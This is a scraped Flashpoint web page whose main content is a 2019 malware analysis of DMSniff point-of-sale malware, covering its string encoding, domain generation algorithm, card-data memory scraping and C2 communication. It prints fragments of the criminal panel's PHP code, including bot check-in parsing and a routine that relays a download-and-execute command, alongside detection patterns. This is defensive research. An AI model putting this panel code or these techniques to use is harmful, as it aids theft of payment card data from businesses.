Close

[]

Josh Lefkowitz

Chief Executive Officer

Josh Lefkowitz executes the company’s strategic vision to empower
organizations with Business Risk Intelligence (BRI). He has worked
extensively with authorities to track and analyze terrorist groups. Mr.
Lefkowitz also served as a consultant to the FBI’s senior management
team and worked for a top tier, global investment bank. Mr. Lefkowitz
holds an MBA from Harvard University and a BA from Williams College.

[]

Evan Kohlmann

Chief Innovation Officer

Evan Kohlmann focuses on product innovation at Flashpoint where he
leverages fifteen years’ experience tracking Al-Qaida, ISIS, and other
terrorist groups. He has consulted for the US Department of Defense, the
US Department of Justice, the Australian Federal Police, and Scotland
Yard’s Counter Terrorism Command, among others. Mr. Kohlmann holds a JD
from the Univ. of Pennsylvania Law School and a BSFS in International
Politics from the Walsh School of Foreign Service at Georgetown Univ.

[]

Josh Devon

Chief Operating Officer / VP Product

Josh Devon focuses on product vision and strategy at Flashpoint while
ensuring the company’s departments function synergistically during its
rapid growth. He also works to ensure that customers receive best in
class products, services, and support. Previously, Mr. Devon co-founded
the SITE Intelligence Group where he served as Assistant Director. He
holds an MA from SAIS at Johns Hopkins Univ. At the Univ. of
Pennsylvania, he received a BS in Economics from the Wharton School and
a BA in English from the College of Arts and Sciences.

[]

Jennifer Leggio

Chief Marketing Officer

Jennifer Leggio is responsible for Flashpoint’s marketing, customer
acquisition, and operations. Ms. Leggio has more than 20 years of
experience driving marketing, communications and go-to-market strategies
in the cybersecurity industry. She’s previously held senior leadership
roles at Digital Shadows, Cisco, Sourcefire, and Fortinet. She’s been a
contributor to Forbes and ZDNet, and has spoken on the importance of
coordinated disclosure at DEF CON and Hack in the Box, and on threat
actor “publicity” trends at RSA Conference, Gartner Security Summit, and
SXSW Interactive.

[]

Chris Camacho

Chief Strategy Officer

Chris Camacho leads the company’s sales and client engagement &
development teams, which also includes customer success, solution
architecture, business development, strategic integrations, and the
FPCollab sharing community. With over 15 years of cybersecurity
leadership experience, he has spearheaded initiatives across Operational
Strategy, Incident Response, Threat Management, and Security Operations
to ensure cyber risk postures align with business goals. Most recently
as a Senior Vice President of Information Security at Bank of America,
Mr. Camacho was responsible for overseeing the Threat Management
Program. An entrepreneur, Mr. Camacho also serves as CEO for NinjaJobs:
a career-matching community for elite cybersecurity talent. He has a BS
in Decision Sciences & Management of Information Systems from George
Mason University.

[]

Lisa Iadanza

Chief People Officer

Lisa M. Iadanza leads all functional areas of People Operations at
Flashpoint, including human resources, talent acquisition & management,
employee engagement, and developing high performance teams. In addition
to collaborating with the executive team to drive strategic growth, she
plays an integral role in fostering Flashpoint’s culture and mission.
Driven by her passions for mentorship, employee advocacy, and talent
development, Ms. Iadanza has more than twenty years of experience in
building, scaling, and leading human resources functions. Prior to
Flashpoint, she held leadership roles at Conde Nast, Terra Technology,
and FreeWheel. She is a member of the Society for Human Resources
Management (SHRM) and holds a bachelor’s degree in management with
concentrations in human resources and marketing from State University of
New York at Binghamton.

[]

Rob Reznick

VP of Finance and Corporate Development

Rob Reznick leads the finance, accounting, and corporate development
teams at Flashpoint. Rob previously served as Director of Finance &
Accounting for 1010data (acquired by Advance/Newhouse), and Director of
Finance for Financial Guard (acquired by Legg Mason) after prior work in
forensic accounting and dispute consulting. Mr. Reznick is a Certified
Public Accountant and holds an MBA and MAcc from the Fisher College of
Business at the Ohio State University, and a BBA from the Ross School of
Business at the University of Michigan.

[]

Lance James

Chief Scientist / VP Engineering

Lance James is responsible for leading Flashpoint’s technology
development. Prior to joining Flashpoint in 2015, he was the Head of
Cyber Intelligence at Deloitte & Touche LLP. Mr. James has been an
active member of the security community for over 20 years and enjoys
working creatively together with technology teams to design and develop
impactful solutions that disrupt online threats.

[]

Brian Costello

SVP Global Partnerships and U.S. Public Sector

Brian Costello, a 20-year information technology and security solutions
veteran, is responsible for leading the Global Sales, Solution
Architecture, and Professional Services teams at Flashpoint. Throughout
his career, Brian has successfully built security and cloud teams that
have provided customers with innovative technology solutions, exceeded
targets and consistently grown business year over year. Prior to
Flashpoint, Brian led a global security and cloud vertical practice for
Verizon. Brian also held senior leadership roles at Invincea, Risk
Analytics and Cybertrust. Brian received his B.A. from George Mason
University.

[]

Tom Hofmann

VP Intelligence

Tom Hofmann leads the intelligence directorate that is responsible for
the collection, analysis, production, and dissemination of Deep and Dark
Web data. He works closely with clients to prioritize their intelligence
requirements and ensures internal Flashpoint operations are aligned to
those needs. Mr. Hofmann has been at the forefront of cyber intelligence
operations in the commercial, government, and military sectors, and is
renowned for his ability to drive effective intelligence operations to
support offensive and defensive network operations.

[]

Jake Wells

VP, Client Engagement & Development and Solution Architecture

Jake Wells leads strategic integrations and information sharing as part
of the client engagement & development team, which serves as an internal
advocate for our government and commercial clients to ensure
Flashpoint’s intelligence solutions meet their evolving needs. He
leverages a decade of experience running cyber and counterterrorism
investigations, most recently with the NYPD Intelligence Bureau, to
maximize the value customers generate from our products and services.
Mr. Wells holds an MA from Columbia University and a BA from Emory
University.

[]

Brian Brown

VP Business Development

Brian Brown is responsible for the overall direction of strategic sales
and development supporting Flashpoint’s largest clients. In his role,
Mr. Brown focuses on designing and executing growth-oriented sales
penetration strategies across multiple vertical markets, including both
Government and Commercial, supporting Flashpoint’s Sales and Business
Development Teams. An experienced entrepreneur, Mr. Brown also serves as
CSO for NinjaJobs, a private community created to match elite
cybersecurity talent with top tier global jobs and also advise
growth-stage cybersecurity companies.

[]

Justin Rogers

VP Revenue Operations

Justin Rogers leads the Revenue Operations team at Flashpoint, aligning
marketing, sales, partnerships, and customer success across vision,
planning, process, and goals. He leverages over 15 years of experience
in security, strategy, product design, and implementation to drive
growth, provide an end-to-end view of the customer journey, and a
seamless customer experience. Recently, Justin led Marketing for
Centripetal, bringing the first Threat Intelligence Gateway to market.
Previously, he managed operations of a Counter IED lab electronics
forensics division while forward deployed in support of Operation Iraqi
Freedom and Operation Enduring Freedom in Afghanistan. Justin holds a BS
in Electrical Engineering from the University of New Hampshire.

[]

Glenn Lemons

Executive Director of Customer Success

Glenn Lemons is a Executive Director of Customer Success at Flashpoint.
He previously served as the acting Director of Citigroup's Cyber
Intelligence Center where he was responsible for analyzing and reacting
to intelligence from a variety of threats. These threats ranged from
fraudulent activity and attempting to defraud Citi's clients to
supporting security operations for the firm's worldwide network
presence. He has extensive experience working with multiple clients
across the financial services, manufacturing, healthcare, and public
sectors. Glenn also has more than 26 years of intelligence experience
within the operational and support communities in the U.S. military and
federal civilian service; seven of which focused on both defensive and
offensive cyber operations. While working for the U.S. Department of
Homeland Security, he testified numerous times before U.S. Congressional
committees and member requested open and closed sessions.

Close

[]

Steve Leightell

Steve started his career in Internet sales in the early 1990s and was
always a top sales rep before transitioning to business development. By
the early 2000s, he was the Director of Business Development at DWL,
where he managed a team that built partnerships with Accenture, Oracle,
Tata Consulting, Wipro, Cognizant and IBM. Steve designed the channel
and strategy that ultimately culminated in the acquisition of DWL by IBM
in 2005. He went on to lead a global team within IBM that was
responsible for major system integrator partnerships. In 2008, he left
IBM to found a niche consulting firm focused on business development for
SaaS organizations. Steve holds a BA in anthropology and sociology from
Carleton University in Ottawa.

[]

Ellie Wheeler

Ellie Wheeler is a Partner at Greycroft and is based in the firm’s New
York office. Prior to joining Greycroft, Ellie worked in a similar role
evaluating investment opportunities at Lowercase Capital. Ellie also
worked at Cisco in Corporate Development doing acquisitions,
investments, and strategy within the unified communications, enterprise
software, mobile, and video sectors. While at Cisco, she was involved in
multiple acquisitions and investments, including PostPath, Jabber,
Xobni, and Tandberg. She began her career in growth capital private
equity at Summit Partners in Boston. Ellie graduated magna cum laude
from Georgetown University with a BA in Psychology and holds an MBA from
Harvard Business School.

[]

Glenn McGonnigle

Glenn McGonnigle is a General Partner at TechOperators. Prior to
launching TechOperators in 2008, Glenn was CEO of VistaScape Security
Systems, a venture-backed provider of enterprise intelligent video
surveillance software. He lead the company through its successful sale
to Siemens Building Technologies. Previously, Glenn was a co-founder and
senior executive of Atlanta-based Internet Security Systems (ISS) where
he helped raise initial venture capital and launch the business. For 7
years, he led the business development team in developing sales channels
and entering the managed security services market. During his tenure,
the company grew from startup to revenues of over $225 million and was
later acquired by IBM for $1.3 billion.

[]

Peter George

Peter George has an established track record of building companies that
deliver sustained growth and profits and in identifying critical
worldwide partnership opportunities that strategically expand market
share. Prior to becoming President and CEO of Fidelis Security Systems
in 2008, Mr. George spent the last seven years as President and CEO of
Crossbeam Systems, the market leader in the high-end segment of the
Unified Threat Management market, where he took the company from being a
pre-revenue start-up to over $50 million in revenue. Previously, he was
President of Nortel Networks Enterprise Business in Europe, Middle-East,
and Africa, responsible for managing more than 5,000 employees and $2
billion in revenue. Mr. George came to Nortel via their 1998 acquisition
of Bay Networks where he was serving as vice president of European
operations. During his tenure at Wellfleet and Bay, he played key sales
executive roles in New England and in Europe. Prior to joining
Wellfleet, Mr. George served as the Northeast regional manager and GM of
Canada at 3Com Corporation, and also held senior management positions at
Ungerman Bass. He received his BA from the College of the Holy Cross,
and has done graduate studies at Harvard and Oxford University.

[]

Brendan Hannigan

Brendan joined Polaris Partners in 2016 as an entrepreneur partner. In
this role, he focuses on funding and founding companies in the
technology sector with a concentration in cloud, analytics, and
cybersecurity. Brendan is a co-founder of Sonrai Security and chairman
of Twistlock, both Polaris investments. He also currently serves on the
board of Bitsight Technologies and Flashpoint. A 25 year technology
industry veteran, Brendan was most recently the general manager of IBM
Security. Under Brendan’s leadership, IBM Security grew significantly
faster than the overall security market to become the number one
enterprise security provider in the world with almost $2B of annual
revenue.

This website uses cookies. This website uses cookies. By continuing your
browsing on this site, you agree to the use of cookies.

image/svg+xml

image/svg+xml

Learn More

Accept

EN

-   English
-   日本語
-   Español
-   Deutsche
-   Português

-   About
-   Products
-   Services
-   Partners
-   Blog
-   Media
-   Resources
-   Careers
-   Contact Us

-   Explore
-   Educate
-   Engage

Request a Demo

Close

Products

-   
    Intelligence Platform
    Access our archive of intelligence and data from illicit online
    communities.
-   
    Flashpoint API
    Near real-time access to finished intelligence and uniquely sourced
    data.

Services

-   
    Professional Services
    Helping organizations make decisions to combat threats and mitigate
    risk.
-   
    Threat Response & Readiness
    A subscription service that helps companies prepare for and respond
    to, a ransomware or cyber extortion attack.

Teams

-   
    Cyber Threat Intelligence
-   
    Corporate & Physical Security
-   
    Fraud
-   
    Insider Threat

-   
    Webinars
    Where Flashpoint analyst share insights from cyber and physical
    landscapes.
-   
    Collective Intelligence Podcasts
    Featuring regular interviews with industry experts and Flashpoint
    analyst.

-   
    Blog
    Unique discoveries, observations, and opinions on trending security
    events.
-   
    Case Studies
    Security practitioners all across sectors are using Business Risk
    Intelligence.

Intelligence Basics

New to BRI? Need a refresher on intelligence tradecraft? Looking for
tips on mitigating risk?

image/svg+xml

image/svg+xml

Start Here

-   
    Upcoming Events
    Join us online or in person at one of our many global events.

-   
    Request a Meeting
    Interested in learning more about Flashpoint products and services?

-   
    Become a Partner
    Interested in joining one of our Partner Programs?

Type your search and press enter

What are you looking for?

Cybersecurity

Physical Security

Vendor Risk

Fraud

Insider Threat

-   

    Explore

-   

    Educate

-   

    Engage

Contact Us

-   About
-   Products
-   Services
-   Partners
-   Blog
-   Media
-   Resources
-   Careers
-   Contact Us

EN

-   English
-   日本語
-   Español
-   Deutsche
-   Português

image/svg+xml

image/svg+xml

Back

Products

-   
    Intelligence Platform
    Access our archive of intelligence and data from illicit online
    communities.
-   
    Flashpoint API
    Near real-time access to finished intelligence and uniquely sourced
    data.

Services

-   
    Professional Services
    Helping organizations make decisions to combat threats and mitigate
    risk.
-   
    Threat Response & Readiness
    A subscription service that helps companies prepare for and respond
    to, a ransomware or cyber extortion attack.

Teams

-   
    Cyber Threat Intelligence
-   
    Corporate & Physical Security
-   
    Fraud
-   
    Insider Threat

-   
    Webinars
    Where Flashpoint analyst share insights from cyber and physical
    landscapes.
-   
    Collective Intelligence Podcasts
    Featuring regular interviews with industry experts and Flashpoint
    analyst.

-   
    Blog
    Unique discoveries, observations, and opinions on trending security
    events.
-   
    Case Studies
    Security practitioners all across sectors are using Business Risk
    Intelligence.

Intelligence Basics

New to BRI? Need a refresher on intelligence tradecraft? Looking for
tips on mitigating risk?

image/svg+xml

image/svg+xml

Start Here

-   
    Upcoming Events
    Join us online or in person at one of our many global events.

-   
    Request a Meeting
    Interested in learning more about Flashpoint products and services?

-   
    Become a Partner
    Interested in joining one of our Partner Programs?

Filter by

image/svg+xml

image/svg+xml

Flashpoint Appoints Ian Schenkel Vice President of EMEA as Global Growth
Accelerates

image/svg+xml

image/svg+xml

Blog

‘DMSniff’ POS Malware Actively Leveraged to Target Small-, Medium-Sized Businesses

Blog

March 13, 2019

-   
-   
-   
-   

By Jason Reaves & Joshua Platt

Point-of-sale malware previously only privately sold has been used in
breaches of small- and medium-sized businesses in the restaurant and
entertainment industries. The malware, known as DMSniff, also uses a
domain generation algorithm (DGA) to create lists of command-and-control
domains on the fly. This technique is valuable to an attacker because if
domains are taken down by law enforcement, technology companies, or
hosting providers, the malware can still communicate and receive
commands or share stolen data.

Researchers at Flashpoint believe the use of a DGA is rarely seen in the
realm of POS malware.

Point-of-sale malware continues to plague industries such as food
services and hospitality where older and unsupported systems remain
prevalent, especially in small- and medium-sized companies. In these
environments where card-present transactions are king, criminals have
been relentless in targeting these vulnerable devices. Data from last
year’s Verizon Data Breach Investigations Report indicates that
point-of-sale terminals were the second most-attacked network asset
behind database servers.

Most often, the malware scrapes Track 1 and Track 2 data from a credit
card when it’s swiped through a terminal, before it is encrypted and
sent to a payment processor. Attackers may either physically tamper with
a POS device to install the malware, or can exploit a vulnerability over
the network to infect a device.

As for DMSniff, it appears to have flown under the radar for at least
four years, and has been actively used since at least 2016. Flashpoint
analysts believe attackers using DMSniff could be gaining an initial
foothold on devices either by using brute-force attacks against SSH
connections, or by scanning for vulnerabilities and exploiting those.

Below, we share some technical details on the malware and corresponding
panel code. We also share some possible mitigations and links to
indicators of compromise.

Diving Into DMSniff
===================

DMSniff uses multiple techniques in order to protect itself and its
command-and-control (C2) communications from researchers and law
enforcement. The first technique is a simple string-encoding routine,
below, designed to hide its strings. This shields the malware’s
capabilities from detection, making it difficult for researchers to
learn its capabilities.

[Image 1: The string encoding used by DMSniff.]

Image 1: The string encoding used by DMSniff.

A pseudocode Python-based implementation of this can be found below:

[Image 2: The pseudocode Python-based implementation of the string
encoding. ]

Image 2: The pseudocode Python-based implementation of the string
encoding.

Using this, Flashpoint decoded select strings, which can be downloaded
below. Another technique used by this malware is a DGA that allows it to
resist takedowns and bypass trivial blocking mechanisms.

[Image 3: The malware’s initial DGA.]

Image 3: The malware’s initial DGA.

The DGA is based on a number of hardcoded values; in the samples
researchers have found, the first two characters of the generated
domains are hardcoded in the bot. Researchers have found 11 variants of
this DGA so far, all structured in the same algorithm, but with variable
first two letters and hardcoded multiply values in the algorithm.

[Image 4: Pseudocode for the domain generation algorithm.]

Image 4: Pseudocode for the domain generation algorithm.

The bot loops through the domain generation while rotating through a
list of top-level domains (TLDs)— e.g .in, .ru, .net, .org, .com—until
it finds a server it can talk to. The data that was harvested by the bot
to create a hostid is then sent off inside the user-agent.

[Image 5: Malware check-in example.]

Image 5: Malware check-in example.

It is worth noting the fake response, which pretends to be an error.
There is also some data in the response that is commented out as “vqns”;
this is verified by the bot to determine whether it is a real C2 domain.

[Image 6: Malware code for parsing comment block.]

Image 6: Malware code for parsing comment block.

For the data theft portion of the POS, the bot is simplistic because it
comes with an onboard list of process names to avoid; it will use this
list while looping through the process tree. Each time it finds an
interesting process, it will loop through the memory sections to attempt
to find a credit card number. Once a number is found, the bot will take
the card data and some of the surrounding memory, packages it, and sends
it to the C2.

[Image 7: Redacted DMSniff panel, bot overview.]

Image 7: Redacted DMSniff panel, bot overview.

After a report on the stolen data has been downloaded or reviewed, it is
deleted from the panel, meaning the stolen data is being exfiltrated
somewhere else either to store or sell.  

Below is the PHP code from the panel responsible for deleting reports
after being sent:

//- del all sent  
   
  $das = $_GET[‘das’];  
   
  if (!empty($das))  
  {  
   $dh = opendir($dirn);  
   if (!$dh) { echo “cant open dir”; die(); }  
   
   while (($file = readdir($dh)) !== false)  
   {   
    if ($file[0] != ‘d’) continue;  
    if ($file[1] != ‘_’) continue;  
    if (!strpos($file,”.SENTOK”)) continue;  
   
    if (defined(“MARKER”))  
    {  
     $exp=explode(‘_’,$file);  
     if ($exp[1] != MARKER) continue;  
    }  
   
    unlink($file);  
   }  
  }

From the panel, an entry of the XOR value needed to unlock the report is
added; the panel will then verify the data. As of this writing, all
identified panels and bots use the same single byte XOR key of ‘0xd’ or
‘13.’

[Image 8: Redacted DMSniff report data overview for retrieving stolen
data in the panel.]

Image 8: Redacted DMSniff report data overview for retrieving stolen
data in the panel.

Stolen data files are based on the bot data and a marker value:

$filedst = DMPPATH.’/d_’.$mrk.’_’.$realip.’_’.mktime();

The marker value is at most 0-2 in length:

 $mrk    = $_GET[‘m’];  
  if (strlen($mrk) > 2) die(); // hack protection

  
 This is also where the .upl files are created to signify the bot has
uploaded data:

$fnm = my_base64_encode($exp[1]);  
$f = fopen(INFOPATH.$fnm.’.upl’,”w”);  
$data = mktime().’|’.$exp[1].’|’.$realip.’|’;  
fputs($f,$data);  
fclose($f);  

If all is successful for the uploader, an <!-OK-> is returned:

 if ($filear[“error”][0] == 0) echo “<!-OK->”;

Panel code to parse bot checkin:

 $ua  = getenv(‘HTTP_USER_AGENT’);  
  $pos = strpos($ua,’DSNF_’);  

The returned data from this is a string-encoded version of the PID
(Process Identifier) with every digit having “a” added to it and
hardcoded mul values similar to the DGA and stored in a fake 404 page in
a comment.

 $tmp = substr($ua,$pos+5);  
  $exp = explode(‘)’,$tmp);  
  $pid = $exp[0];  
   
  echo
“<!-“.chr(97+ToRange($pid)).chr(97+ToRange(3*$pid)).chr(97+ToRange(5*$pid)).chr(97+ToRange(7*$pid)).”->”;

If a shell command has been set via a .prt file, then another comment
will be added:

// shl cmd  
   
   if (file_exists(INFOPATH.$fnm.’.prt’) )  
   {  
    $shl = file_get_contents(INFOPATH.$fnm.’.prt’);  
    $exp = explode(‘|’,$shl);  
    echo “<!-#”.$exp[0].”->”;  
   }  
   
  }

This will have the ip:port for the bot to connect to and download and
execute files. The bot uses FTP to accomplish this action of downloading
secondary files.

Conclusion
==========

DMSniff is another name in a growing list of evolving threats for the
point-of-sale malware world. During our research we found that this
malware was primarily utilized to target small to medium sized
businesses such as restaurants and theaters. It also contains a domain
generation algorithm, something that is rare to see in point-of-sale
malware

Mitigations
===========

Flashpoint recommends organizations regularly update all attack surface
appliances. The suspected infection avenue is SSH brute forcing (low
confidence) and common exploit scanners (low confidence). Host-based
detections for the following file could also be beneficial:

dmsnf.cfg

Also monitoring for abnormal Windows processes execution, such as the
following:

Image=”*csrss.exe” AND (ParentImage!=”*system” OR
ParentImage!=”*smss.exe”)

Image=”*lsass.exe” AND ParentImage!=”*wininit.exe”

As with all host-based indicators, additional tuning may be needed
depending on the environment.  

Attachments & Downloads
=======================

• To download the indicators of compromise (IOCs) for DMSniff, click
here.

• To download the decoded strings for DMSniff, click here.

[avatar]

Jason Reaves {.ab-profile-name style="color:#32373c"}
------------

Principal Threat Researcher

Jason Reaves is a Principal Threat Researcher at Flashpoint who
specializes in malware reverse-engineering. He has spent the majority of
his career tracking threats in the Crimeware domain, including
reverse-engineering data structures and algorithms found in malware in
order to create automated frameworks for harvesting configuration and
botnet data. Previously, he worked as a software developer and unix
administrator in the financial industry and also spent six years in the
U.S. Army. Jason holds multiple certifications related to
reverse-engineering and application exploitation and has published
numerous papers on topics such as writing malware scripts pretending to
be a bot, unpackers, configuration data harvesters and covert channel
utilities. He enjoys long walks in IDA and staring at RFCs for hours.

[avatar]

Joshua Platt {.ab-profile-name style="color:#32373c"}
------------

Principal Threat Researcher

Joshua Platt is a Principal Threat Researcher at Flashpoint who
specializes in investigating complex financial crimeware families. As a
former network security engineer, he first began reversing malware while
working in the financial services industry nearly 10 years ago. Joshua
graduated from the University of North Texas with a B.S. in criminal
justice and has earned multiple certifications within the security
industry related to reverse engineering and penetration testing.

-   
-   
-   
-   

[]

Blog

October 3, 2019

Inside Payment Card Fraud: Part 2

Isaac Palmer examines what criminals do with card data after obtaining
it, the abundance of carding tutorials within online threat-actor
communities, and the implications for defenders.

[]

Blog

October 2, 2019

Inside Payment Card Fraud: Part 1

Isaac Palmer examines why payment card fraud remains pervasive despite
ongoing efforts to combat it and how criminals obtain victims’ card data

[emerging threats]

Blog

September 30, 2019

Fake ID Fabrication in Race with Anti-Fraud Measures

A growing underground economy of sites services criminals wishing to
obtain and use fraudulent U.S. ID cards.

Flashpoint Intelligence Brief

Subscribe to our newsletter to stay up-to-date on our latest research,
news, and events

image/svg+xml

image/svg+xml

Subscribe

Products & Services

-   Intelligence Platform
-   Flashpoint API
-   Professional Services
-   Threat Response
-   Alerting

Company

-   About
-   Partners
-   Media
-   Events
-   Careers
-   Contact Us

Resources

-   Flash Talks
-   Podcasts
-   Blog
-   Case Studies

Social

-   LinkedIn
-   Twitter
-   Facebook

-   
-   
-   

© 2019 Flashpoint. All rights reserved

-   Terms of Service
-   Privacy Policy
-   Cookie Policy

Close

1 of 10
